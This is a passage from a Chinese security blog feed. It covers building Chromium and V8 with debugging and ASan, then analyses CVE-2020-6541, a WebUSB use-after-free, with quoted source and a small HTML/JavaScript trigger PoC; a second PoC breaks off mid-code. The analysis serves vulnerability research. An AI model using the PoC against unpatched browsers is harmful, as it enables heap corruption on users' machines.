vulnerability]</span><br><span class="line"><span class="comment"># 下载依赖</span></span><br><span class="line">gclient <span class="built_in">sync</span></span><br></pre></td></tr></table></figure></li><li><p>开始尝试编译</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 生成配置文件</span></span><br><span class="line">  <span class="comment"># 其中 is_debug = true将会使得在编译chromium时，完整保留调试信息</span></span><br><span class="line">  <span class="comment"># is_component_build = true将会使得编译时产生拆分的众多.so/.dll文件，这样可以降低链接所需要消耗的时间</span></span><br><span class="line">  <span class="comment"># is_asan = true 编译时启动asan</span></span><br><span class="line">gn gen out/asan_debug --args=<span class="string">&quot;is_debug=true is_component_build=true is_asan = true&quot;</span></span><br><span class="line"><span class="comment"># 开始编译，预计耗时4个小时</span></span><br><span class="line">autoninja -C out/asan_debug chrome</span><br></pre></td></tr></table></figure></li><li><p>编译完成后，即可启动chromium</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./out/asan_debug/chrome</span><br></pre></td></tr></table></figure><p>笔者启动chromium时，asan提示<code>odr-violation</code>报错</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Kiprey @ Kipwn in /usr/class/chromium [14:19:24] C:1</span></span><br><span class="line">$ ./src/out/asan_debug/chrome</span><br><span class="line">=================================================================</span><br><span class="line">==189815==ERROR: AddressSanitizer: odr-violation (0x7f44b9504700):</span><br><span class="line">  [1] size=40 <span class="string">&#x27;vtable for media::VaapiDmaBufVideoFrameMapper&#x27;</span> ../../media/gpu/vaapi/vaapi_dmabuf_video_frame_mapper.cc</span><br><span class="line">  [2] size=40 <span class="string">&#x27;vtable for media::VaapiDmaBufVideoFrameMapper&#x27;</span> ../../media/gpu/vaapi/vaapi_dmabuf_video_frame_mapper.cc</span><br><span class="line">These globals were registered at these points:</span><br><span class="line">  [1]:</span><br><span class="line">    <span class="comment">#0 0x55f8a95f810d in __asan_register_globals /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_globals.cpp:360:3</span></span><br><span class="line">    <span class="comment">#1 0x7f4471d6895b in asan.module_ctor (/usr/class/chromium/src/out/asan_debug/libservice.so+0x2b5595b)</span></span><br><span class="line"></span><br><span class="line">  [2]:</span><br><span class="line">    <span class="comment">#0 0x55f8a95f810d in __asan_register_globals /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_globals.cpp:360:3</span></span><br><span class="line">    <span class="comment">#1 0x7f44b87abe7b in asan.module_ctor (/usr/class/chromium/src/out/asan_debug/libmedia_gpu.so+0x335e7b)</span></span><br><span class="line"></span><br><span class="line">==189815==HINT: <span class="keyword">if</span> you don<span class="string">&#x27;t care about these errors you may set ASAN_OPTIONS=detect_odr_violation=0</span></span><br><span class="line"><span class="string">SUMMARY: AddressSanitizer: odr-violation: global &#x27;</span>vtable <span class="keyword">for</span> media::VaapiDmaBufVideoFrameMapper<span class="string">&#x27; at ../../media/gpu/vaapi/vaapi_dmabuf_video_frame_mapper.cc</span></span><br><span class="line"><span class="string">==189815==ABORTING</span></span><br><span class="line"><span class="string"></span></span><br></pre></td></tr></table></figure><p><code>odr-violation</code>这类错误我们忽略即可，因此我们需要设置一下环境变量<code>ASAN_OPTIONS</code></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">export</span> ASAN_OPTIONS=detect_odr_violation=0</span><br></pre></td></tr></table></figure><p>之后即可正常执行chrome。</p></li></ul><h2 id="四、v8代码下拉及编译">四、v8代码下拉及编译</h2><ul><li><p>v8的代码下拉也很简单，一条命令即可，同样必须使用git代理。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fetch v8</span><br></pre></td></tr></table></figure></li><li><p>之后就和编译chromium一样，先设置git分支，再设置编译参数，最后开始编译</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> v8</span><br><span class="line"><span class="comment"># 如果编译最新版的话，就不用这行命令</span></span><br><span class="line"><span class="comment"># 如果是要调洞的话，就要在这里切到有漏洞的那个commit</span></span><br><span class="line">git reset --hard [commit <span class="built_in">hash</span> with vulnerability]</span><br><span class="line"><span class="comment"># gclient sync 用来下载一些其他需要的东西，</span></span><br><span class="line"><span class="comment"># 这个还需要curl的代理，之前也已经在环境变量配置了</span></span><br><span class="line">gclient <span class="built_in">sync</span></span><br><span class="line"><span class="comment"># 设置编译参数</span></span><br><span class="line">tools/dev/v8gen.py x64.debug</span><br><span class="line"><span class="comment"># 编译</span></span><br><span class="line">ninja -C out.gn/x64.debug</span><br></pre></td></tr></table></figure><blockquote><p>如果需要切换特定版本，则使用以下命令</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 这里的&lt;TagName&gt;指的就是version</span></span><br><span class="line"><span class="comment"># 查看对应version/tag是否存在</span></span><br><span class="line">git tag | grep <span class="string">&quot;&lt;TagName&gt;&quot;</span></span><br><span class="line"><span class="comment"># 切换至目标version/tag</span></span><br><span class="line">git checkout &lt;TagName&gt;</span><br><span class="line"><span class="comment"># 下载对应依赖项</span></span><br><span class="line">gclient <span class="built_in">sync</span></span><br></pre></td></tr></table></figure></blockquote></li><li><p>编译完成后即可执行v8</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./out.gn/x64.debug/d8</span><br></pre></td></tr></table></figure></li><li><p>v8 还自带了gdb插件，可以让我们更加方便的使用gdb来调试v8。</p><p>在<code>~/.gdbinit</code>内添加以下两行即可使用：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">source</span> /path/to/v8/tools/gdbinit</span><br><span class="line"><span class="built_in">source</span> /path/to/v8/tools/gdb-v8-support.py</span><br></pre></td></tr></table></figure><p>有兴趣的话还可以简单阅读一下这两个文件，这样可以更好的了解 v8 插件的使用方式。</p></li></ul><h2 id="五、参考">五、参考</h2><ul><li><p><a href="https://mem2019.github.io/jekyll/update/2019/07/18/V8-Env-Config.html">V8环境搭建，100%成功版</a></p></li><li><p><a href="https://chromium.googlesource.com/chromium/src/+/master/docs/linux/build_instructions.md">Checking out and building Chromium on Linux</a></p></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、背景&quot;&gt;一、背景&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;由于chromium的多线程、多进程机制较为复杂，因此调试起来较为麻烦，通过源代码层面打log来调试显得十分必要，而且源码级调试可以大幅度降低调试难度。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;同时，倘若需要某个特定版本的chromium时，委托他人代为编译也较为不便，&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;因此，手动编译chromium是十分必要的。在这篇文章中，笔者将自己下拉代码&amp;amp;编译代码的步骤列入其中，仅供参考。&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="chrome" scheme="https://kiprey.github.io/categories/chrome/"/>
    
    
    <category term="v8" scheme="https://kiprey.github.io/tags/v8/"/>
    
    <category term="chrome" scheme="https://kiprey.github.io/tags/chrome/"/>
    
  </entry>
  
  <entry>
    <title>CVE-2020-6541分析</title>
    <link href="https://kiprey.github.io/2020/10/CVE-2020-6541/"/>
    <id>https://kiprey.github.io/2020/10/CVE-2020-6541/</id>
    <published>2020-10-26T07:24:31.000Z</published>
    <updated>2025-11-24T03:59:39.770Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><ul><li><p>CVE-2020-6541是 Chromium中WebUSB的一个Use-after-free漏洞，在版本84.0.4147.105之前该漏洞允许攻击者通过精心构造的html代码来造成堆破坏。</p><span id="more"></span></li></ul><h2 id="二、漏洞相关">二、漏洞相关</h2><blockquote><p>上一篇文章中我们分析的是CVE-2020-6549。而这个漏洞与我们现在分析的CVE-2020-6541如出一辙，都是</p><blockquote><p><strong>外层循环使用迭代器来循环调用内层函数，之后该内层函数执行对应JS函数，而该JS函数会进一步执行某个函数使得外层循环所使用的迭代器失效。</strong></p></blockquote><p>因此，该分析将重点偏向于Promise的Resolve流程与POC的编写。</p></blockquote><h3 id="1-漏洞细节">1. 漏洞细节</h3><ul><li><p>以下是<a href="https://source.chromium.org/chromium/chromium/src/+/master:third_party/blink/renderer/modules/webusb/usb.cc;drc=52bc92da6df065ff12ee81563e23fde2e8db94f9;l=249">漏洞函数的源码</a></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">USB::OnServiceConnectionError</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  service_.<span class="built_in">reset</span>();</span><br><span class="line">  client_receiver_.<span class="built_in">reset</span>();</span><br><span class="line">  <span class="keyword">for</span> (ScriptPromiseResolver* resolver : get_devices_requests_)</span><br><span class="line">    <span class="comment">// 注意这里调用的Resolve</span></span><br><span class="line">    resolver-&gt;<span class="built_in">Resolve</span>(HeapVector&lt;Member&lt;USBDevice&gt;&gt;(<span class="number">0</span>));</span><br><span class="line">  get_devices_requests_.<span class="built_in">clear</span>();</span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> (ScriptPromiseResolver* resolver : get_permission_requests_) &#123;</span><br><span class="line">    resolver-&gt;<span class="built_in">Reject</span>(<span class="built_in">MakeGarbageCollected</span>&lt;DOMException&gt;(</span><br><span class="line">        DOMExceptionCode::kNotFoundError, kNoDeviceSelected));</span><br><span class="line">  &#125;</span><br><span class="line">  get_permission_requests_.<span class="built_in">clear</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>函数<code>OnServiceConnectionError</code>在内部会调用<code>Resolve</code>函数，它可以同步运行用户定义的JavaScript函数。如果JS函数调用<code>USB::getDevices</code>函数，那么该函数将修改<code>get_devices_requests_</code>哈希集合（hash_set）。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">ScriptPromise <span class="title">USB::getDevices</span><span class="params">(ScriptState* script_state,</span></span></span><br><span class="line"><span class="params"><span class="function">                              ExceptionState&amp; exception_state)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="built_in">EnsureServiceConnection</span>();</span><br><span class="line">  <span class="keyword">auto</span>* resolver = <span class="built_in">MakeGarbageCollected</span>&lt;ScriptPromiseResolver&gt;(script_state);</span><br><span class="line">  <span class="comment">// 注意这里的insert语句</span></span><br><span class="line">  get_devices_requests_.<span class="built_in">insert</span>(resolver);</span><br><span class="line">  service_-&gt;<span class="built_in">GetDevices</span>(WTF::<span class="built_in">Bind</span>(&amp;USB::OnGetDevices, <span class="built_in">WrapPersistent</span>(<span class="keyword">this</span>),</span><br><span class="line">                                 <span class="built_in">WrapPersistent</span>(resolver)));</span><br><span class="line">  <span class="keyword">return</span> resolver-&gt;<span class="built_in">Promise</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这样会使基于范围的for循环中所使用的迭代器无效。如此，在循环的下一个迭代中，<strong>使用失效的迭代器将会造成UAF</strong>。</p></li></ul><h3 id="2-Promise的简单研究">2. Promise的简单研究</h3><blockquote><p>该漏洞最关键的地方，其实<strong>已经在漏洞概述中几句话讲解完成了</strong>。因此我们下面的分析主要是研究Promise的调用链。这个调用链不涉及漏洞的具体细节，只是作为一个扩展来学习一下。</p></blockquote><ul><li><p>函数<code>USB::OnServiceConnectionError</code>会在基于迭代器的for循环中调用<code>resolver-&gt;Resolve</code>函数。而<code>Resove</code>函数内部调用<code>ResolveOrReject</code>函数</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Anything that can be passed to toV8 can be passed to this function.</span></span><br><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">typename</span> T&gt;</span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">Resolve</span><span class="params">(T value)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">ResolveOrReject</span>(value, kResolving);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>ResolveOrReject</code>函数源码如下。注意函数的最后一行，如果没有特殊情况，则该ScriptPromiseResolver将调用<code>ResolveOrRejectImmediately()</code>以立即<code>Resolve</code>或<code>Reject</code>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">typename</span> T&gt;</span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">ResolveOrReject</span><span class="params">(T value, ResolutionState new_state)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  state_ = new_state;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">GetExecutionContext</span>()-&gt;<span class="built_in">IsContextPaused</span>()) &#123;</span><br><span class="line">    <span class="built_in">ScheduleResolveOrReject</span>();</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// TODO(esprehn): This is a hack, instead we should CHECK that</span></span><br><span class="line">  <span class="comment">// script is allowed, and v8 should be running the entry hooks below and</span></span><br><span class="line">  <span class="comment">// crashing if script is forbidden. We should then audit all users of</span></span><br><span class="line">  <span class="comment">// ScriptPromiseResolver and the related specs and switch to an async</span></span><br><span class="line">  <span class="comment">// resolve.</span></span><br><span class="line">  <span class="comment">// See: http://crbug.com/663476</span></span><br><span class="line">  <span class="keyword">if</span> (ScriptForbiddenScope::<span class="built_in">IsScriptForbidden</span>()) &#123;</span><br><span class="line">    <span class="built_in">ScheduleResolveOrReject</span>();</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="built_in">ResolveOrRejectImmediately</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>在之前的函数调用中，ScriptPromiseResolver所设置的<code>state_</code>为<code>kResolving</code>，因此执行<code>resolver_.Resolve</code>函数。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">ScriptPromiseResolver::ResolveOrRejectImmediately</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="built_in">DCHECK</span>(!<span class="built_in">GetExecutionContext</span>()-&gt;<span class="built_in">IsContextDestroyed</span>());</span><br><span class="line">  <span class="built_in">DCHECK</span>(!<span class="built_in">GetExecutionContext</span>()-&gt;<span class="built_in">IsContextPaused</span>());</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> (state_ == kResolving) &#123;</span><br><span class="line">      <span class="comment">// 调用Resolve</span></span><br><span class="line">      resolver_.<span class="built_in">Resolve</span>(value_.<span class="built_in">NewLocal</span>(script_state_-&gt;<span class="built_in">GetIsolate</span>()));</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="built_in">DCHECK_EQ</span>(state_, kRejecting);</span><br><span class="line">      resolver_.<span class="built_in">Reject</span>(value_.<span class="built_in">NewLocal</span>(script_state_-&gt;<span class="built_in">GetIsolate</span>()));</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">Detach</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>从<code>ScriptPromise::InternalResolver::Resolve</code>函数以后的函数调用就涉及到V8了，这里我们就不再展开。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> ScriptPromise::InternalResolver::<span class="built_in">Resolve</span>(v8::Local&lt;v8::Value&gt; value) &#123;</span><br><span class="line">  <span class="keyword">if</span> (resolver_.<span class="built_in">IsEmpty</span>())</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  v8::Maybe&lt;<span class="type">bool</span>&gt; result =</span><br><span class="line">      resolver_.<span class="built_in">V8Value</span>().<span class="built_in">As</span>&lt;v8::Promise::Resolver&gt;()-&gt;<span class="built_in">Resolve</span>(</span><br><span class="line">          script_state_-&gt;<span class="built_in">GetContext</span>(), value);</span><br><span class="line">  <span class="comment">// |result| can be empty when the thread is being terminated. We ignore such</span></span><br><span class="line">  <span class="comment">// errors.</span></span><br><span class="line">  <span class="built_in">ALLOW_UNUSED_LOCAL</span>(result);</span><br><span class="line"></span><br><span class="line">  <span class="built_in">Clear</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h3 id="3-POC">3. POC</h3><h4 id="a-如何触发onServiceConnectionError">a. 如何触发onServiceConnectionError</h4><p>这里我们需要回溯<code>onServiceConnectionError</code>函数的调用链。通过在线源码的交叉引用，我们可以发现在函数<code>USB::EnsureServiceConnection</code>中，<code>USB::OnServiceConnectionError</code>函数将会被设置为某个service的<code>disconnection_handler</code>。</p><p>也就是说，当该service被关闭后，我们的目标函数<code>OnServiceConnectionError</code>将会被自动调用。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">USB::EnsureServiceConnection</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (service_.<span class="built_in">is_bound</span>())</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">  <span class="built_in">DCHECK</span>(<span class="built_in">IsContextSupported</span>());</span><br><span class="line">  <span class="built_in">DCHECK</span>(<span class="built_in">IsFeatureEnabled</span>(ReportOptions::kDoNotReport));</span><br><span class="line">  <span class="comment">// See https://bit.ly/2S0zRAS for task types.</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// 注意看以下代码，该部分代码将service与对应mojo的IPC接口绑定在一起</span></span><br><span class="line">  <span class="keyword">auto</span> task_runner =</span><br><span class="line">      <span class="built_in">GetExecutionContext</span>()-&gt;<span class="built_in">GetTaskRunner</span>(TaskType::kMiscPlatformAPI);</span><br><span class="line">  <span class="built_in">GetExecutionContext</span>()-&gt;<span class="built_in">GetBrowserInterfaceBroker</span>().<span class="built_in">GetInterface</span>(</span><br><span class="line">      service_.<span class="built_in">BindNewPipeAndPassReceiver</span>(task_runner));</span><br><span class="line">  <span class="comment">// 注意这里，该行语句设置service断开时所要调用的回调函数，可以看到调用的是USB::OnServiceConnectionError</span></span><br><span class="line">  service_.<span class="built_in">set_disconnect_handler</span>(</span><br><span class="line">      WTF::<span class="built_in">Bind</span>(&amp;USB::OnServiceConnectionError, <span class="built_in">WrapWeakPersistent</span>(<span class="keyword">this</span>)));</span><br><span class="line"></span><br><span class="line">  <span class="built_in">DCHECK</span>(!client_receiver_.<span class="built_in">is_bound</span>());</span><br><span class="line"></span><br><span class="line">  service_-&gt;<span class="built_in">SetClient</span>(</span><br><span class="line">      client_receiver_.<span class="built_in">BindNewEndpointAndPassRemote</span>(task_runner));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>那么现在有两个问题</p><ul><li><p>第一个问题，<strong>如何执行<code>USB::EnsureServiceConnection</code>函数</strong>？显而易见，如果该函数没有被执行，那么<code>OnServiceConnectionError</code>函数就不会被绑定，那就更别说调用了。</p><p>还是通过交叉引用，我们可以发现<code>USB::getDevices</code>函数会调用<code>EnsureServiceConnection</code>函数。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">ScriptPromise <span class="title">USB::getDevices</span><span class="params">(ScriptState* script_state,</span></span></span><br><span class="line"><span class="params"><span class="function">                              ExceptionState&amp; exception_state)</span> </span>&#123;</span><br><span class="line"> <span class="comment">// ...</span></span><br><span class="line">  <span class="built_in">EnsureServiceConnection</span>();  <span class="comment">// 注意这里</span></span><br><span class="line">  <span class="keyword">auto</span>* resolver = <span class="built_in">MakeGarbageCollected</span>&lt;ScriptPromiseResolver&gt;(script_state);</span><br><span class="line">  get_devices_requests_.<span class="built_in">insert</span>(resolver);</span><br><span class="line">  service_-&gt;<span class="built_in">GetDevices</span>(WTF::<span class="built_in">Bind</span>(&amp;USB::OnGetDevices, <span class="built_in">WrapPersistent</span>(<span class="keyword">this</span>),</span><br><span class="line">                                 <span class="built_in">WrapPersistent</span>(resolver)));</span><br><span class="line">  <span class="keyword">return</span> resolver-&gt;<span class="built_in">Promise</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>因此我们可以通过<strong>执行<code>USB::getDevices</code>函数来执行<code>EnsureServiceConnection</code>函数</strong>，为未来执行<code>OnServiceConnectionError</code>函数做好准备。</p><p>同时，通过执行<code>getDevices</code>函数，当触发<code>onServiceConnectionError</code>函数时，<strong><code>get_devices_requests_</code>集合不为空</strong>，这样就可以进一步执行其中的<code>Reslove</code>方法。</p><p>综上，执行<code>getDevices</code>函数可以完美的达到我们的预期目的，一箭双雕。</p></li><li><p>第二个问题，我们<strong>如何触发service的关闭</strong>？</p><p>通过审计<code>USB::EnsureServiceConnection</code>函数的代码，我们可以发现，service在该函数中绑定了某个mojo IPC管道。如果我们能够触发该IPC管道的关闭，那么就可以触发service的disconnect_handler，最终也就能执行我们的目标函数<code>onServiceConnectionError</code>。</p><p>而关闭mojo IPC管道最简单的方式就是——<strong>关闭浏览器tab</strong>。</p></li></ul><p>因此最终我们可以编写以下代码来触发<code>onServiceConnectionError</code>函数。</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">if</span> (!location.<span class="property">hash</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="title function_">open</span>(location.<span class="property">href</span> + <span class="string">&#x27;#second&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">        &#125; <span class="keyword">else</span> &#123;</span></span><br><span class="line"><span class="language-javascript">            navigator.<span class="property">usb</span>.<span class="title function_">getDevices</span>();</span></span><br><span class="line"><span class="language-javascript">            <span class="title function_">close</span>();</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">    </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br></pre></td></tr></table></figure><p>如图所示，成功触发：</p><p><img src="/2020/10/CVE-2020-6541/onSCE.png" alt="img"></p><h4 id="b-如何在Resolve内部执行getDevices">b. 如何在Resolve内部执行getDevices</h4><p>现在，我们已经可以通过构造特定的JS代码来执行<code>onServiceConnectionError</code>函数，进而执行其中的<code>reslover-&gt;Resolve</code>语句。问题是，我们<strong>如何使这个Promise在Resolve时可以执行我们所指定的JS代码</strong>。</p><blockquote><p>为便于分析，再贴一下<code>USB::OnServiceConnectionError</code>函数源码</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">USB::OnServiceConnectionError</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  service_.<span class="built_in">reset</span>();</span><br><span class="line">  client_receiver_.<span class="built_in">reset</span>();</span><br><span class="line">  <span class="keyword">for</span> (ScriptPromiseResolver* resolver : get_devices_requests_)</span><br><span class="line">    <span class="comment">// 注意这里调用的Resolve，返回的值是一个空的数组</span></span><br><span class="line">    resolver-&gt;<span class="built_in">Resolve</span>(HeapVector&lt;Member&lt;USBDevice&gt;&gt;(<span class="number">0</span>));</span><br><span class="line">  get_devices_requests_.<span class="built_in">clear</span>();</span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> (ScriptPromiseResolver* resolver : get_permission_requests_) &#123;</span><br><span class="line">    resolver-&gt;<span class="built_in">Reject</span>(<span class="built_in">MakeGarbageCollected</span>&lt;DOMException&gt;(</span><br><span class="line">        DOMExceptionCode::kNotFoundError, kNoDeviceSelected));</span><br><span class="line">  &#125;</span><br><span class="line">  get_permission_requests_.<span class="built_in">clear</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>初始时笔者尝试使用JS中的<code>then</code>操作，但通过本地调试发现无法达到预期目的。</p><blockquote><p>尚未明确无法成功的原因，查找该原因可能需要对Promise机制有更深的理解。</p></blockquote><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">function</span> <span class="title function_">poc</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">if</span> (!location.<span class="property">hash</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">open</span>(location.<span class="property">href</span> + <span class="string">&#x27;#second&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">            &#125; <span 